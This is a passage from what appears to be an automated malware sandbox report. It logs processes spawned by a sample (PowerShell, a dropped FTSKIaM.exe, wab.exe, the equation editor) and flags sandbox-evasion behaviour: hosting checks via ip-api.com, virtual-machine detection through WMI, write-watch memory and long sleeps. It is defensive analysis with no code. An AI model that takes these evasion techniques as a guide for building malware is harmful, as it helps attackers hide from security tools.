Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 208D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 1FC20000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20CE0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 208C0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 49E0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20C60000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20AF0000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 594727	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 540167	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599978	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 540042
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599838
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599697
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 480060
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 420140
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1800000
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1800000

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2831	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7066	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2599
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7355
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 2713	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 7086	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 674
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1753
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3950
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5945
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 874
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1200
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3028
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2272
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 4247
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 5365
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 7240
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 2550

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3272	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3500	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe TID: 3528	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3640	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3652	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3652	Thread sleep time: -594727s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3652	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3784	Thread sleep count: 2599 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3784	Thread sleep count: 7355 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3820	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3824	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3920	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1968	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -12000000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -540167s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -599978s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -79813s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -59980s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -39971s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1236	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3500	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3612	Thread sleep count: 3950 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3612	Thread sleep count: 5945 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3688	Thread sleep time: -1844674407370954s >= -30000s
